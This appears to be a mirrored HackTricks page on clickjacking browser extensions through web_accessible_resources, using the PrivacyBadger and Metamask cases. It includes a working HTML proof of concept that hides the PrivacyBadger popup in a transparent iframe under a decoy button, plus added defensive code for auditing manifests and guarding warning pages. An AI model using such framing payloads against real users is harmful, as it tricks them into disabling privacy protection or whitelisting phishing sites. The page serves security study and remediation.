mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
115 lines
6.9 KiB
Markdown
# BrowExt - ClickJacking

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Basic Information

This page covers abusing a ClickJacking vulnerability in a browser extension.\
If you don't know what ClickJacking is, check:

{% content-ref url="../clickjacking.md" %}
[clickjacking.md](../clickjacking.md)
{% endcontent-ref %}

Extensions contain the file **`manifest.json`**, and that JSON file has a field `web_accessible_resources`. Here's what [the Chrome docs](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) say about it:

> These resources would then be available in a webpage via the URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, which can be generated with the **`extension.getURL`** method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)

In addition to being web accessible, the resources in **`web_accessible_resources`** run with the ambient authority of the extension: they can alter state, load other resources, and modify the browser in certain ways. If a document in `web_accessible_resources` can perform any interesting behavior, an attacker can embed it in a webpage and trick visitors into triggering it.

## PrivacyBadger Example

It was discovered that in the PrivacyBadger extension, the contents of the directory `skin/` were `web_accessible_resources`:

```json
"web_accessible_resources": [
    "skin/*",
    "icons/*"
]
```

So, by loading `skin/popup.html`, the document that gets rendered when you click the PrivacyBadger icon in the browser, **in an iframe, we could fool the user into clicking "Disable PrivacyBadger for this Website"**, opening up the user to additional tracking and undermining the function of PrivacyBadger. **Check the ClickJacking video example at** [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)

The fix was easy: **remove `skin/*` from the `web_accessible_resources`**.
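
An audit helper for the pattern described in Basic Information and shown in the PrivacyBadger manifest above, written as an added example (not PrivacyBadger's, Metamask's or HackTricks' code): it walks `web_accessible_resources` in both the MV2 list form and the MV3 object form and flags every entry that a web page could load in an iframe. The sample manifests, the `app.example` match pattern and the extension id placeholder are constructed for the demo; the same check applies to the Metamask manifest discussed further down the page.

```javascript
// Added example: audit web_accessible_resources of an extension manifest and
// flag entries a web page could frame. Handles the MV2 list form quoted above
// and the MV3 object form. Sample manifests at the bottom are constructed.

function exposedResources(manifest) {
  const war = manifest.web_accessible_resources || [];
  const out = [];
  for (const entry of war) {
    if (typeof entry === 'string') {
      // MV2: a bare path or glob, reachable from every web origin
      out.push({ resource: entry, everySite: true });
    } else if (entry && Array.isArray(entry.resources)) {
      // MV3: exposure is scoped by "matches"; an entry that only lists
      // "extension_ids" is not reachable from web pages at all
      const matches = entry.matches || [];
      if (matches.length === 0) continue;
      const everySite = matches.some(m => m === '<all_urls>' || /^\*:\/\/\*\//.test(m));
      for (const r of entry.resources) out.push({ resource: r, everySite });
    }
  }
  return out;
}

function auditWebAccessible(manifest) {
  const findings = [];
  for (const { resource, everySite } of exposedResources(manifest)) {
    const scope = everySite ? 'any site' : 'the listed sites only';
    if (/\.html?$/i.test(resource)) {
      // A document with UI is the clickjacking target: it renders with the
      // extension's authority inside an attacker-controlled frame
      findings.push({ resource, severity: everySite ? 'high' : 'medium',
                      reason: `HTML document framable from ${scope}` });
    } else if (resource.includes('*')) {
      // A glob exposes whatever lands in that directory, now or later
      findings.push({ resource, severity: 'review',
                      reason: `glob exposes every file under it to ${scope}; confirm it holds no HTML` });
    }
  }
  return findings;
}

// Constructed manifests modelled on the two entries quoted on this page
const privacyBadgerLike = { manifest_version: 2, web_accessible_resources: ['skin/*', 'icons/*'] };
const warningPageLike = { manifest_version: 2, web_accessible_resources: ['inpage.js', 'phishing.html'] };
const mv3Scoped = { manifest_version: 3, web_accessible_resources: [
  { resources: ['ui/popup.html'], matches: ['https://app.example/*'] },
  { resources: ['bridge.html'], extension_ids: ['EXTENSION_ID_PLACEHOLDER'] } ] };

for (const m of [privacyBadgerLike, warningPageLike, mv3Scoped]) console.log(auditWebAccessible(m));
```

Running it on the PrivacyBadger-style manifest reports both globs for review, while the fixed manifest (only `icons/*`) leaves a single glob to confirm; `phishing.html` is reported as high because every site may frame it.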
### PoC

```html
<style>
    iframe {
        width: 430px;
        height: 300px;
        opacity: 0.01;
        float: top;
        position: absolute;
    }

    #stuff {
        float: top;
        position: absolute;
    }

    button {
        float: top;
        position: absolute;
        top: 168px;
        left: 100px;
    }
</style>

<div id="stuff">
    <h1>
        Click the button
    </h1>
    <button id="button">
        click me
    </button>
</div>

<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```

## Metamask Example

A [**blog post about a ClickJacking in Metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`**, for example):

<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>

**Another ClickJacking fixed** in the Metamask extension was that users were able to **click to whitelist** when a page was suspected of being phishing, because of `"web_accessible_resources": ["inpage.js", "phishing.html"]`. As that page was vulnerable to ClickJacking, an attacker could abuse it by showing something normal to make the victim click to whitelist it without noticing, and then go back to the phishing page, which would by then be whitelisted.
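
The defensive pattern behind the two Metamask fixes above, as an added example that is not Metamask's code: a warning page offering a "whitelist this site" control refuses to act when it is not the top-level document, and only accepts a suspect URL whose protocol is `http:` or `https:`, taking the hostname from the parsed URL rather than a raw string. The `url` query parameter and the `whitelist` element id are this example's own assumptions.

```javascript
// Added example (not Metamask's code): guard logic for an extension warning
// page, written as pure functions so it can be unit-tested outside a browser.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the hostname to whitelist, or null when the candidate is not a web origin
function whitelistableHost(rawSuspectUrl) {
  let url;
  try { url = new URL(rawSuspectUrl); } catch { return null; }
  // Rejects chrome:, chrome-extension:, data: and similar non-web schemes
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return null;
  return url.hostname;
}

// framed is window.top !== window.self in the real page
function decideWhitelistControl({ framed, rawSuspectUrl }) {
  if (framed) return { show: false, reason: 'page is embedded in another document' };
  const host = whitelistableHost(rawSuspectUrl);
  if (host === null) return { show: false, reason: 'suspect URL is not an http(s) origin' };
  return { show: true, host };
}

// Wiring for the real page; skipped when run outside a browser (e.g. under node)
if (typeof window !== 'undefined') {
  const params = new URLSearchParams(window.location.search);   // assumed ?url=... parameter
  const decision = decideWhitelistControl({
    framed: window.top !== window.self,
    rawSuspectUrl: params.get('url') || '',
  });
  const button = document.getElementById('whitelist');          // assumed element id
  if (button) button.hidden = !decision.show;
}
```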
## Steam Inventory Helper Example

Check the following page to see how an **XSS** in a browser extension was chained with a **ClickJacking** vulnerability:

{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
{% endcontent-ref %}

## References

* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
